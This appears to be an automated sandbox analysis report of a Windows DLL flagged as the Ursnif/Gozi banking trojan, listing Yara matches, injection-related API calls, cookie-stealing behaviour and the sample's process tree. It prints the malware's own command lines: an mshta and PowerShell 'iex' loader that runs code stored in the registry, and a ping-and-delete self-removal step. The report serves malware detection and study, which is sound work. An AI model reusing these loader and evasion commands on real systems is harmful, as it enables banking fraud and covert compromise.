Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000001.00000002.1037430854.00000000008EB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 2_2_05FA5ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 2_2_05FA5ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 2_2_05FA5ECA
Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBCD7A NtQueryInformationProcess, 2_2_05FBCD7A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 2_2_05FAACD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 2_2_05FB6CBC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 2_2_05FBAC94
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA7E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 2_2_05FA7E14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAA027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 2_2_05FAA027
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 2_2_05FB7AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA45FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 2_2_05FA45FF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA9DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_05FA9DAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 2_2_05FB956E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB4C67 NtGetContextThread,RtlNtStatusToDosError, 2_2_05FB4C67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA37E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_05FA37E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_05FB1606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 2_2_05FC298D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB40A7 memset,NtQueryInformationProcess, 2_2_05FB40A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA7878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 2_2_05FA7878
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAAA15 NtQuerySystemInformation,RtlNtStatusToDosError, 2_2_05FAAA15
Source: C:\Windows\explorer.exe Code function: 36_2_04DC1DF4 NtWriteVirtualMemory, 36_2_04DC1DF4
Source: C:\Windows\explorer.exe Code function: 36_2_04DA7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 36_2_04DA7DA0
Source: C:\Windows\explorer.exe Code function: 36_2_04DB3EF4 NtQuerySystemInformation, 36_2_04DB3EF4
Source: C:\Windows\explorer.exe Code function: 36_2_04DC46EC NtAllocateVirtualMemory, 36_2_04DC46EC
Source: C:\Windows\explorer.exe Code function: 36_2_04DBF0D0 NtReadVirtualMemory, 36_2_04DBF0D0
Source: C:\Windows\explorer.exe Code function: 36_2_04DB1084 NtQueryInformationProcess, 36_2_04DB1084
Source: C:\Windows\explorer.exe Code function: 36_2_04DA69DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 36_2_04DA69DC
Source: C:\Windows\explorer.exe Code function: 36_2_04DAB980 NtMapViewOfSection, 36_2_04DAB980
Source: C:\Windows\explorer.exe Code function: 36_2_04DA1148 NtCreateSection, 36_2_04DA1148
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC1CB8 CreateProcessAsUserA, 2_2_05FC1CB8
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBED4B 2_2_05FBED4B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA4C03 2_2_05FA4C03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC3EAF 2_2_05FC3EAF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC7188 2_2_05FC7188
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAD0DC 2_2_05FAD0DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB48AD 2_2_05FB48AD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBD057 2_2_05FBD057
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB8BF3 2_2_05FB8BF3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAE384 2_2_05FAE384
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA62FA 2_2_05FA62FA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBDA71 2_2_05FBDA71
Source: C:\Windows\explorer.exe Code function: 36_2_04DAECE0 36_2_04DAECE0
Source: C:\Windows\explorer.exe Code function: 36_2_04DA96D8 36_2_04DA96D8
Source: C:\Windows\explorer.exe Code function: 36_2_04DADF58 36_2_04DADF58
Source: C:\Windows\explorer.exe Code function: 36_2_04DCA074 36_2_04DCA074
Source: C:\Windows\explorer.exe Code function: 36_2_04DBB814 36_2_04DBB814
Source: C:\Windows\explorer.exe Code function: 36_2_04DA69DC 36_2_04DA69DC
Source: C:\Windows\explorer.exe Code function: 36_2_04DA49C4 36_2_04DA49C4
Source: C:\Windows\explorer.exe Code function: 36_2_04DBD92C 36_2_04DBD92C
Source: C:\Windows\explorer.exe Code function: 36_2_04DADA3C 36_2_04DADA3C
Source: C:\Windows\explorer.exe Code function: 36_2_04DBAA28 36_2_04DBAA28
Source: C:\Windows\explorer.exe Code function: 36_2_04DAFCA0 36_2_04DAFCA0
Source: C:\Windows\explorer.exe Code function: 36_2_04DB1C0C 36_2_04DB1C0C
Source: C:\Windows\explorer.exe Code function: 36_2_04DA65D8 36_2_04DA65D8
Source: C:\Windows\explorer.exe Code function: 36_2_04DB75D8 36_2_04DB75D8
Source: C:\Windows\explorer.exe Code function: 36_2_04DB8DD0 36_2_04DB8DD0
Source: C:\Windows\explorer.exe Code function: 36_2_04DA5DA8 36_2_04DA5DA8
Source: C:\Windows\explorer.exe Code function: 36_2_04DB25A4 36_2_04DB25A4
Source: C:\Windows\explorer.exe Code function: 36_2_04DC7D44 36_2_04DC7D44
Source: C:\Windows\explorer.exe Code function: 36_2_04DCC560 36_2_04DCC560
Source: C:\Windows\explorer.exe Code function: 36_2_04DB6528 36_2_04DB6528
Source: C:\Windows\explorer.exe Code function: 36_2_04DBCE90 36_2_04DBCE90
Source: C:\Windows\explorer.exe Code function: 36_2_04DD0614 36_2_04DD0614
Source: C:\Windows\explorer.exe Code function: 36_2_04DA1600 36_2_04DA1600
Source: C:\Windows\explorer.exe Code function: 36_2_04DBA0F0 36_2_04DBA0F0
Source: C:\Windows\explorer.exe Code function: 36_2_04DB9850 36_2_04DB9850
Source: C:\Windows\explorer.exe Code function: 36_2_04DB782C 36_2_04DB782C
Source: C:\Windows\explorer.exe Code function: 36_2_04DC19FC 36_2_04DC19FC
Source: C:\Windows\explorer.exe Code function: 36_2_04DCA9FC 36_2_04DCA9FC
Source: C:\Windows\explorer.exe Code function: 36_2_04DB99F8 36_2_04DB99F8
Source: C:\Windows\explorer.exe Code function: 36_2_04DAB9E8 36_2_04DAB9E8
Source: C:\Windows\explorer.exe Code function: 36_2_04DA596C 36_2_04DA596C
Source: C:\Windows\explorer.exe Code function: 36_2_04DC6250 36_2_04DC6250
Source: C:\Windows\explorer.exe Code function: 36_2_04DCEA40 36_2_04DCEA40
Source: C:\Windows\explorer.exe Code function: 36_2_04DD027C 36_2_04DD027C
Source: C:\Windows\explorer.exe Code function: 36_2_04DB7218 36_2_04DB7218
Source: C:\Windows\explorer.exe Code function: 36_2_04DA2A34 36_2_04DA2A34
Source: C:\Windows\explorer.exe Code function: 36_2_04DA9A34 36_2_04DA9A34
Source: C:\Windows\explorer.exe Code function: 36_2_04DCE220 36_2_04DCE220
Source: C:\Windows\explorer.exe Code function: 36_2_04DC93FC 36_2_04DC93FC
Source: C:\Windows\explorer.exe Code function: 36_2_04DC03EC 36_2_04DC03EC
Source: C:\Windows\explorer.exe Code function: 36_2_04DCA3B2 36_2_04DCA3B2
Source: C:\Windows\explorer.exe Code function: 36_2_04DA7B44 36_2_04DA7B44
Source: C:\Windows\explorer.exe Code function: 36_2_04DBB378 36_2_04DBB378
Source: C:\Windows\explorer.exe Code function: 36_2_04DC4B78 36_2_04DC4B78
Source: C:\Windows\explorer.exe Code function: 36_2_04DB6B00 36_2_04DB6B00
PE file does not import any functions
Source: fcanujkk.dll.29.dr Static PE information: No import functions for PE file found
Source: m5xmn43s.dll.32.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@43/151@17/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAA7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 2_2_05FAA7B1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{53D6E16D-5C93-11EB-90EB-ECF4BBEA1588}.dat Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{FA89DFE9-1191-3C17-6BCE-D530CFE2D964}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6297719A-59AF-E450-F3B6-9D58D74A210C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF0E355E1BD9BB118B.TMP Jump to behavior
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Virustotal: Detection: 33%
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll ReversingLabs: Detection: 25%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82970 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17432 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82970 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17432 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
